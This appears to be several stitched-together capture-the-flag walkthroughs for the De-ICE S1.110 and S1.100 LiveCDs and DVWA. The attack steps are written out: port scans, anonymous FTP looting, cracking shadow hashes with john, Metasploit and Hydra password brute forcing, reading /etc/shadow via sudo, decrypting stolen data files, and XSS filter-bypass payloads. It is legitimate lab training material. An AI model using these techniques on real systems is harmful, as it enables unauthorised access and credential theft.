rpatel:$1$c8U/IeIf$g91rGG1w6ulFOgRto6R.D/:16442:0:99999:7:::
sjohnson:$1$zoW/NeIf$I6x4GbMkhjKDps9B56Yrm0:16442:0:99999:7:::
mnader:$1$u5Z/SeIf$9qy9RwXoat1fLfbQMjvri.:16442:0:99999:7:::
krenfro:$1$Hwb/XeIf$626PVcnIxjUS6zrwWz40P.:16442:0:99999:7:::

unshadow 120passwd 120shadow > 120unshadow
john -rules -wordlist=/usr/share/wordlists/rockyou.txt 120unshadow

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information

 

Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

Hitting it with a version scan to determine what is running. We are going to output the file as xml and practice using the metasploit database. You can run it all from inside nmap using the db_nmap command and then normal nmap switches but I’m showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a database named deice and sets it as the current working

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website because it has info you need.
adamsa@herot.net
banterb@herot.net
coffeec@herot.net

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous

Use either use the command line to get access to ftp or filezilla.
I used filezilla and downloaded everything.
The download/etc/shadow seems promising
John can work with the shadow file without unshadowing it.

Running john against it:

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in dowload/opt/cygwin/etc but no shadow file so moving along
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that it is a linux core dump file…go read some on that we’ll wait.

   strings core

The end looks like a dump of a shadow file

   strings core > /root/desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the info and split it at the usernames. If you look at the shadow file from the 100 disk for the normal format; second verse, same as the first.

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow

This gives us the following users root, bbanter. SSH to the system and get root.

   ssh to the box as bbanter
   ssh bbanter@192.168.42.110
   su -

From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.

   cd /
   find -iname *.enc

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc-d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT NO JOY!
Lets go look at the /home/root/.save folder

   cd /home/root/.save
   ls

Look at the copy.sh script

   cat copy.sh

This is the script that encrypted the file, the pass is in the “file” section. Lets decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM you’re done. Openssl is a pain but now you’re a pro.

Account Information

root:Complexity
bbanter:Zymurgy

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture the flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHALK still has the best Tux logo of any distro, RIP PHALK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.

SE-ICE S1.100

Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black box test. Since I am running this in a local VMWare environment speed isn’t an issue so -T5 it is. I also what to do OS detection and service enumeration so I’m using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

To start out I always by looking for low hanging fruit. Since the FTP service looks to be broken, based on the Nmap scan results we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Marymarym@herot.net
Pat Patrickpatrickp@herot.net
Terry Thompsonthompsont@herot.net
Ben Benedictbenedictb@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Adam Adamsadamsa@herot.net
Bob Banterbanterb@herot.net
Chad Coffeecoffeec@herot.net

This is where it helps to have either been a sys admin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last>, <first initial><last>. I’ve also had <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial> we will use that and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee

I’ll use metasploit to do the initial check for weak SSH passwords. You can set your options differently this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true

Look at that! There is nothing better than a shell and you will never forget the first one you get. Mine was a unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now so lets see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet since in Linux and Unix systems it allows users to run the su command. aadams is a member of the wheel group so we will try to brute force that password, again using metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can directly attach shadow files so lets try it using the rockyou wordlist. The first one runs a simple set of rules to look for easy passwords, basically so you don’t have to find bbanter again.

john --signle deiceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -

Now that we are root on the system lets look for sensitive data on the system.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc, google that I bet salary information isn’t supposed to be there. Running strings definitely doesn’t produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

But try googling the Salted__n and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break encryption and second after some research we know that it is encrypted using OpenSSL.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10

That is certainly sensitive data! We’ve got all the flag, time to call it a day.

 

The assumption is that you are here because you are either trying to learn about web app pen testing or you are stuck on one of the challenges. Everyone has their own way that they like to approach web applications. This is mine. We will end up at the same place so don’t get too hung up on style, focus on content.

All of the posts here are spoilers

To setup for all of the different challenges in DVWA you need to set the security level. This is relatively simple, just click the DVWA Security button and set the level through the interface.

Set Security Level

Set Security Level

XSS Reflected – Low

I have security set to low and I have clicked on the XSS Reflected button. Nice test box huh? Well now what are you doing to do? I like to jump right in and start stuffing things in there. No foreplay or anything.

HTML Injection Test

HTML Injection Test

Why didn’t I go right for an alert(‘XSS’)? I like to see if HTML injection is possible at the same time. Feel free to skip that step and go straight to <script>alert(“XSS”)</script>. Look at that! HTML injection is possible. Let us go back and see if we can get a script to run.

HTML Injection Sucess

HTML Injection Sucess

XSS Script Success

XSS Script Success

TL;DR <script>alert(“XSS”)</script>

XSS Reflected – Medium

Set the DVWA Security to Medium and throw that script back in there.

Medium XSS Failure

Medium XSS Failure

Why didn’t that work? Time to dig into the page source. If you read the PHP by clicking on the View Source button the fumction checks for a null string. Then replaces the string <script> with ‘’ if it is found. That is super effective tools or testers that only use the exact string <script>. If you change it up a bit by adding capitalization <SCRipT> or <ScriPt> it doesn’t match and str_replace just passes it through. The PHP function is case sensitive but HTML is not.

PHP Function

PHP Function

TL;DR <SCRipt>alert(“XSS”)</scrIPT>

XSS Reflected – High

The High challenge uses the PHP function htmlspecialchars function to escape special characters. I have tried to encode the string in multiple ways and have not figured out a way to run a script. This is the correct way to handle user inputs and might be breakable but I haven’t found a way around it yet.

Normally, I use Burp Suite to do everything because it does everything. That is because I have the pro version. If you have the community version you know that some of the attacks are throttled and the vulnerability scanner just doesn’t exist. If you don’t have the pro version of Burp or just want to try a different toolset this tutorial will take you through attacking the initial login page of the Damn Vulnerable Web App (DVWA site, DVWA ISO).

Once the application is up and running you will be presented with the initial page.

DVWA Login Page

Home page for DVWA

Now what? You can either skip to the bottom and find it or we can brute-force the password and learn something. First thing we need to do is figure out what to attack. The easiest way is to look at the source code for the page.

Souce Review

Souce Review

 

A second way is to capture a request to the page using a proxy, in keeping with the spirit of not using Burp, I grabbed this one using OWASP Zap.

Zap Proxy Request Capture

Zap Proxy Request Capture

The three fields are username, password, and Login. The next crucial piece is knowing what a bad login displays. This gives Hydra a way of discriminating between valid and bad login attempts.

Failed DVWA Login

Failed DVWA Login

I’m going to use xHydra but will give the command to run Hydra from a shell if that is the only access that you have on a system. Launch Hydra, on Kali Linux it is under the /usr/bin directory. The following images show all of the options being set.

OWASP Target Setup

OWASP Target Setup

Set the IP of the DVWA server and the protocol in use, for this we are attacking the web form so http-post-form. To attack a login of any type you need two other things, a username and a password. The rockyou word list exists at /usr/share/wordlists. I created a short list of usernames to use also.

User List

User List

User Name and Password for Hydra

User Name and Password for Hydra

The next step is to tune the brute force attack. I can use 32 threads and a 1 second timeout because both of the virtual machines, a Kali Linux attacker and the DVWA target, are on the same local LAN segment and there is no concern of causing a denial of service. Also, piping the attack through the Zap proxy is optional and not necessary.

Hydra Tuning

Hydra Tuning

The next tab is where all of the heavy lifting happens. The http / https url field contains the ‘:’ separated string /login.php:username=^USER^&password=^PASS^&Login=Login:Login failed. Breaking out the string the /login.php is the login page. The username and passwords fields are linked to the ^USER^ amd ^PASS^ variables; these are the options set in the Passwords tab. The Login field is not linked to a variable but is used in the login string that we found in image 3. The last string Login failed is what we determined indicated a bad attempt.

Hydra HTTP Setup

Hydra HTTP Setup

Once you are all set to go just click Start on the last tab and watch it go. If you look really closely at password setup you’ll see that I cheated a bit and just ran a single password. I started running the rockyou wordlist and then realized that it would take a significant amount of time to complete.

Brute Force Success

Brute Force Success

To run this from a shell instead of the GUI use:

hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form

-e ns checks for passwords that are the same as the username (s) and null (n)

-f exits after the first pair is found

-u is supposed to make the attack faster according to their readme but it doesn’t really say how. I think that it is a unique switch but I don’t have any proof.

Stay tuned for more DVWA updates on the challenges you now have access to since you brute forced this password.